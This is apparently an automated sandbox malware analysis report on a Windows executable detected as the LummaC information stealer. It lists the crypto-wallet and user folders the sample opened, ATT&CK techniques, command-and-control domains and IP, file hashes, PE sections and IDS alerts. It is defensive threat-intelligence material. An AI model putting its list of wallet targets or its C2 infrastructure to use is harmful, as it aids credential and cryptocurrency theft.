            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
            Source: Yara matchFile source: Process Memory Space: x6VtGfW26X.exe PID: 6940, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected LummaC Stealer
            Source: Yara matchFile source: Process Memory Space: x6VtGfW26X.exe PID: 6940, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            Process Injection            		44
            Virtualization/Sandbox Evasion            		1
            OS Credential Dumping            		861
            Security Software Discovery            		Remote Services1
            Archive Collected Data            		21
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts2
            Command and Scripting Interpreter            		Boot or Logon Initialization Scripts1
            DLL Side-Loading            		1
            Process Injection            		LSASS Memory44
            Virtualization/Sandbox Evasion            		Remote Desktop Protocol31
            Data from Local System            		2
            Non-Application Layer Protocol            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            PowerShell            		Logon Script (Windows)Logon Script (Windows)11
            Deobfuscate/Decode Files or Information            		Security Account Manager2
            Process Discovery            		SMB/Windows Admin SharesData from Network Shared Drive113
            Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook4
            Obfuscated Files or Information            		NTDS1
            File and Directory Discovery            		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
            Software Packing            		LSA Secrets233
            System Information Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading            		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            x6VtGfW26X.exe58%VirustotalBrowse
            x6VtGfW26X.exe65%ReversingLabsWin32.Trojan.Symmi
            x6VtGfW26X.exe100%AviraTR/Crypt.XPACK.Gen
            x6VtGfW26X.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            fancywaxxers.shop100%Avira URL Cloudmalware
            https://fancywaxxers.shop/100%Avira URL Cloudmalware
            https://fancywaxxers.shop/api100%Avira URL Cloudmalware

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            fancywaxxers.shop
            		104.21.112.1
            		truefalse
              		high

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              rabidcowse.shopfalse
                		high
                wholersorie.shopfalse
                  		high
                  fancywaxxers.shoptrue
                  • Avira URL Cloud: malware
                  		unknown
                  cloudewahsj.shopfalse
                    		high
                    noisycuttej.shopfalse
                      		high
                      nearycrepso.shopfalse
                        		high
                        https://fancywaxxers.shop/apitrue
                        • Avira URL Cloud: malware
                        		unknown
                        framekgirus.shopfalse
                          		high
                          tirepublicerj.shopfalse
                            		high
                            abruptyopsn.shopfalse
                              		high

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://duckduckgo.com/chrome_newtabx6VtGfW26X.exe, 00000000.00000003.1726375963.00000000059EA000.00000004.00000800.00020000.00000000.sdmp, x6VtGfW26X.exe, 00000000.00000003.1726304754.00000000059ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://duckduckgo.com/ac/?q=x6VtGfW26X.exe, 00000000.00000003.1726375963.00000000059EA000.00000004.00000800.00020000.00000000.sdmp, x6VtGfW26X.exe, 00000000.00000003.1726304754.00000000059ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgx6VtGfW26X.exe, 00000000.00000003.1754654889.000000000126D000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icox6VtGfW26X.exe, 00000000.00000003.1726375963.00000000059EA000.00000004.00000800.00020000.00000000.sdmp, x6VtGfW26X.exe, 00000000.00000003.1726304754.00000000059ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://crl.microsoftx6VtGfW26X.exe, 00000000.00000003.1824563850.0000000001240000.00000004.00000020.00020000.00000000.sdmp, x6VtGfW26X.exe, 00000000.00000003.1821734147.000000000123E000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.x6VtGfW26X.exe, 00000000.00000003.1754654889.000000000126D000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=x6VtGfW26X.exe, 00000000.00000003.1726375963.00000000059EA000.00000004.00000800.00020000.00000000.sdmp, x6VtGfW26X.exe, 00000000.00000003.1726304754.00000000059ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://crl.rootca1.amazontrust.com/rootca1.crl0x6VtGfW26X.exe, 00000000.00000003.1753167633.00000000059F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctax6VtGfW26X.exe, 00000000.00000003.1754654889.000000000126D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=x6VtGfW26X.exe, 00000000.00000003.1726375963.00000000059EA000.00000004.00000800.00020000.00000000.sdmp, x6VtGfW26X.exe, 00000000.00000003.1726304754.00000000059ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://ocsp.rootca1.amazontrust.com0:x6VtGfW26X.exe, 00000000.00000003.1753167633.00000000059F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016x6VtGfW26X.exe, 00000000.00000003.1726707049.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, x6VtGfW26X.exe, 00000000.00000003.1738963954.00000000059F9000.00000004.00000800.00020000.00000000.sdmp, x6VtGfW26X.exe, 00000000.00000003.1726780789.00000000059F9000.00000004.00000800.00020000.00000000.sdmp, x6VtGfW26X.exe, 00000000.00000003.1738836510.00000000059F9000.00000004.00000800.00020000.00000000.sdmp, x6VtGfW26X.exe, 00000000.00000003.1738674715.00000000059F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17x6VtGfW26X.exe, 00000000.00000003.1726707049.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, x6VtGfW26X.exe, 00000000.00000003.1738963954.00000000059F9000.00000004.00000800.00020000.00000000.sdmp, x6VtGfW26X.exe, 00000000.00000003.1726780789.00000000059F9000.00000004.00000800.00020000.00000000.sdmp, x6VtGfW26X.exe, 00000000.00000003.1738836510.00000000059F9000.00000004.00000800.00020000.00000000.sdmp, x6VtGfW26X.exe, 00000000.00000003.1738674715.00000000059F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://www.ecosia.org/newtab/x6VtGfW26X.exe, 00000000.00000003.1726375963.00000000059EA000.00000004.00000800.00020000.00000000.sdmp, x6VtGfW26X.exe, 00000000.00000003.1726304754.00000000059ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brx6VtGfW26X.exe, 00000000.00000003.1754316169.0000000005AC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://ac.ecosia.org/autocomplete?q=x6VtGfW26X.exe, 00000000.00000003.1726375963.00000000059EA000.00000004.00000800.00020000.00000000.sdmp, x6VtGfW26X.exe, 00000000.00000003.1726304754.00000000059ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgx6VtGfW26X.exe, 00000000.00000003.1754654889.000000000126D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYix6VtGfW26X.exe, 00000000.00000003.1754654889.000000000126D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://x1.c.lencr.org/0x6VtGfW26X.exe, 00000000.00000003.1753167633.00000000059F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://x1.i.lencr.org/0x6VtGfW26X.exe, 00000000.00000003.1753167633.00000000059F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installx6VtGfW26X.exe, 00000000.00000003.1726780789.00000000059D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchx6VtGfW26X.exe, 00000000.00000003.1726375963.00000000059EA000.00000004.00000800.00020000.00000000.sdmp, x6VtGfW26X.exe, 00000000.00000003.1726304754.00000000059ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://support.microsofx6VtGfW26X.exe, 00000000.00000003.1726707049.0000000005A00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://crt.rootca1.amazontrust.com/rootca1.cer0?x6VtGfW26X.exe, 00000000.00000003.1753167633.00000000059F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplesx6VtGfW26X.exe, 00000000.00000003.1726780789.00000000059D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://fancywaxxers.shop/x6VtGfW26X.exe, 00000000.00000003.1824627069.00000000011E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: malware
                                                                                		unknown
                                                                                https://support.mozilla.org/products/firefoxgro.allx6VtGfW26X.exe, 00000000.00000003.1754316169.0000000005AC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=x6VtGfW26X.exe, 00000000.00000003.1726375963.00000000059EA000.00000004.00000800.00020000.00000000.sdmp, x6VtGfW26X.exe, 00000000.00000003.1726304754.00000000059ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94x6VtGfW26X.exe, 00000000.00000003.1754654889.000000000126D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high

                                                                                      World Map of Contacted IPs

                                                                                      • No. of IPs < 25%
                                                                                      • 25% < No. of IPs < 50%
                                                                                      • 50% < No. of IPs < 75%
                                                                                      • 75% < No. of IPs

                                                                                      Public IPs

                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                      104.21.112.1
                                                                                      		fancywaxxers.shopUnited States
                                                                                      		13335CLOUDFLARENETUSfalse

                                                                                      General Information

                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                      Analysis ID:1582690
                                                                                      Start date and time:2024-12-31 09:42:06 +01:00
                                                                                      Joe Sandbox product:CloudBasic
                                                                                      Overall analysis duration:0h 4m 19s
                                                                                      Hypervisor based Inspection enabled:false
                                                                                      Report type:full
                                                                                      Cookbook file name:default.jbs
                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                      Number of analysed new started processes analysed:4
                                                                                      Number of new started drivers analysed:0
                                                                                      Number of existing processes analysed:0
                                                                                      Number of existing drivers analysed:0
                                                                                      Number of injected processes analysed:0
                                                                                      Technologies:
                                                                                      • HCA enabled
                                                                                      • EGA enabled
                                                                                      • AMSI enabled
                                                                                      Analysis Mode:default
                                                                                      Analysis stop reason:Timeout
                                                                                      Sample name:x6VtGfW26X.exe
                                                                                      renamed because original name is a hash value
                                                                                      Original Sample Name:c17d20e6be092651357a8b466257b795.exe
                                                                                      Detection:MAL
                                                                                      Classification:mal100.troj.spyw.evad.winEXE@1/0@1/1
                                                                                      EGA Information:
                                                                                      • Successful, ratio: 100%
                                                                                      HCA Information:Failed
                                                                                      Cookbook Comments:
                                                                                      • Found application associated with file extension: .exe
                                                                                      • Stop behavior analysis, all processes terminated

                                                                                      Warnings

                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                                                      • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.45
                                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                      Simulations

                                                                                      Behavior and APIs

                                                                                      TimeTypeDescription
                                                                                      03:43:02API Interceptor8x Sleep call for process: x6VtGfW26X.exe modified

                                                                                      Joe Sandbox View / Context

                                                                                      IPs

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      104.21.112.1SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                      • beammp.com/phpmyadmin/

                                                                                      Domains

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      fancywaxxers.shopLauncher.exeGet hashmaliciousLummaCBrowse
                                                                                      • 104.21.96.1
                                                                                      GTA-5-Mod-Menu-2025.exeGet hashmaliciousLummaCBrowse
                                                                                      • 104.21.96.1
                                                                                      AquaDiscord-2.0.exeGet hashmaliciousLummaCBrowse
                                                                                      • 104.21.16.1
                                                                                      random.exeGet hashmaliciousLummaCBrowse
                                                                                      • 104.21.48.1
                                                                                      UmotQ1qjLq.exeGet hashmaliciousLummaCBrowse
                                                                                      • 104.21.96.1
                                                                                      R3nz_Loader.exeGet hashmaliciousLummaCBrowse
                                                                                      • 104.21.32.1
                                                                                      Loader.exeGet hashmaliciousLummaCBrowse
                                                                                      • 104.21.80.1

                                                                                      ASNs

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      CLOUDFLARENETUSheteronymous.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                      • 172.67.136.42
                                                                                      re5.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                      • 188.114.96.3
                                                                                      file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 188.114.96.3
                                                                                      zku4YyCG6L.exeGet hashmaliciousUnknownBrowse
                                                                                      • 188.114.96.3
                                                                                      hca5qDUYZH.exeGet hashmaliciousUnknownBrowse
                                                                                      • 188.114.96.3
                                                                                      PO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                      • 188.114.96.3
                                                                                      DIS_37745672.pdfGet hashmaliciousKnowBe4, PDFPhishBrowse
                                                                                      • 104.17.247.203
                                                                                      Poket.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                      • 188.114.97.3
                                                                                      https://nutricarm.es/wp-templates/f8b83.phpGet hashmaliciousUnknownBrowse
                                                                                      • 104.21.96.1
                                                                                      Exlan_setup_v3.1.2.exeGet hashmaliciousLummaCBrowse
                                                                                      • 172.67.157.254

                                                                                      JA3 Fingerprints

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      a0e9f5d64349fb13191bc781f81f42e1re5.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                      • 104.21.112.1
                                                                                      Poket.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                      • 104.21.112.1
                                                                                      Exlan_setup_v3.1.2.exeGet hashmaliciousLummaCBrowse
                                                                                      • 104.21.112.1
                                                                                      Set-up.exeGet hashmaliciousLummaC, GO Backdoor, LummaC StealerBrowse
                                                                                      • 104.21.112.1
                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                      • 104.21.112.1
                                                                                      X-mas_2.3.2.exeGet hashmaliciousLummaCBrowse
                                                                                      • 104.21.112.1
                                                                                      ReploidReplic.exeGet hashmaliciousLummaCBrowse
                                                                                      • 104.21.112.1
                                                                                      Bootstrapper.exeGet hashmaliciousLummaCBrowse
                                                                                      • 104.21.112.1
                                                                                      Launcher.exeGet hashmaliciousLummaCBrowse
                                                                                      • 104.21.112.1
                                                                                      GTA-5-Mod-Menu-2025.exeGet hashmaliciousLummaCBrowse
                                                                                      • 104.21.112.1

                                                                                      Dropped Files

                                                                                      No context

                                                                                      Created / dropped Files

                                                                                      No created / dropped files found

                                                                                      Static File Info

                                                                                      General

                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Entropy (8bit):7.948229887621716
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                      File name:x6VtGfW26X.exe
                                                                                      File size:1'883'648 bytes
                                                                                      MD5:c17d20e6be092651357a8b466257b795
                                                                                      SHA1:042cc7fc9e7a36bf4989b6be834b0d0d95557c89
                                                                                      SHA256:c35fd8893480f059a48cabc6fc0a956106f55ec96d3fa728fab1bdb4b57c1705
                                                                                      SHA512:c10a8fce1342439c1beead880d9f8756127ba18061333dc897a28ba40de8a237b75d827f31d02158238f02af69920bb60a9616cfae45d1601e4f10b19a651623
                                                                                      SSDEEP:24576:B/6qQMUF+lvjGV/Afiy3UK8pphCA1WciDk/ZUakSGMvp7WoCM33KgpPKAv9+1ujJ:BCR+R13Uz0ciD2GMvp7WtM3J39BHwM
                                                                                      TLSH:8F9533A04F1AAC6BF4EE227091A3C293F9F7B54065CDD7C4FBD9243096A636838DD509
                                                                                      File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L... .pg..............................J...........@...........................J...........@.................................Y@..m..

                                                                                      File Icon

                                                                                      Icon Hash:90cececece8e8eb0

                                                                                      Static PE Info

                                                                                      General

                                                                                      Entrypoint:0x8aa000
                                                                                      Entrypoint Section:.taggant
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                      Time Stamp:0x67701720 [Sat Dec 28 15:20:00 2024 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:6
                                                                                      OS Version Minor:0
                                                                                      File Version Major:6
                                                                                      File Version Minor:0
                                                                                      Subsystem Version Major:6
                                                                                      Subsystem Version Minor:0
                                                                                      Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                                      Entrypoint Preview

                                                                                      Instruction
                                                                                      jmp 00007FA6C44F3F6Ah
                                                                                      setl byte ptr [eax+eax]
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      jmp 00007FA6C44F5F65h
                                                                                      add byte ptr [ebx], al
                                                                                      or al, byte ptr [eax]
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], dh
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax+eax], bl
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      or dword ptr [eax+00000000h], eax
                                                                                      add byte ptr [eax], al
                                                                                      adc byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      pop es
                                                                                      or al, byte ptr [eax]
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], dh
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add bh, bh

                                                                                      Data Directories

                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x540590x6d.idata
                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x530000x2b0.rsrc
                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x541f80x8.idata
                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                      Sections

                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                      0x10000x520000x2600037567f68f3bc0ffaaf1c63c68d2e6a4cFalse0.9999421772203947data7.982000691785383IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      .rsrc0x530000x2b00x400fe67bb2a9df3150b9c94de8bd81ed8a0False0.3603515625data5.186832724894366IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      .idata 0x540000x10000x20039a711a7d804ccbc2a14eea65cf3c27eFalse0.154296875data1.0789976601211375IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      0x550000x2b20000x200e9d4dd75a481b2e6368f0d5de2f68d49unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      yojtimdr0x3070000x1a20000x1a20005f24d958da66408207fdf4cefeef98bdFalse0.994666870701256data7.953909419587561IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      yoycphiu0x4a90000x10000x400b2d1ec042ef1c349bb0a40fd3dcce56dFalse0.75data5.863831487470667IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      .taggant0x4aa0000x30000x2200509b693722c977bac204bd1b5623fd43False0.09880514705882353DOS executable (COM)1.1088013999111535IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                      Resources

                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                      RT_MANIFEST0x530580x256ASCII text, with CRLF line terminators0.5100334448160535

                                                                                      Imports

                                                                                      DLLImport
                                                                                      kernel32.dlllstrcpy

                                                                                      Network Behavior

                                                                                      Suricata IDS Alerts

                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                      2024-12-31T09:43:02.129169+01002058656ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fancywaxxers .shop)1192.168.2.4502881.1.1.153UDP
                                                                                      2024-12-31T09:43:02.644820+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.449730104.21.112.1443TCP
                                                                                      2024-12-31T09:43:02.644820+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449730104.21.112.1443TCP
                                                                                      2024-12-31T09:43:03.125539+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449730104.21.112.1443TCP
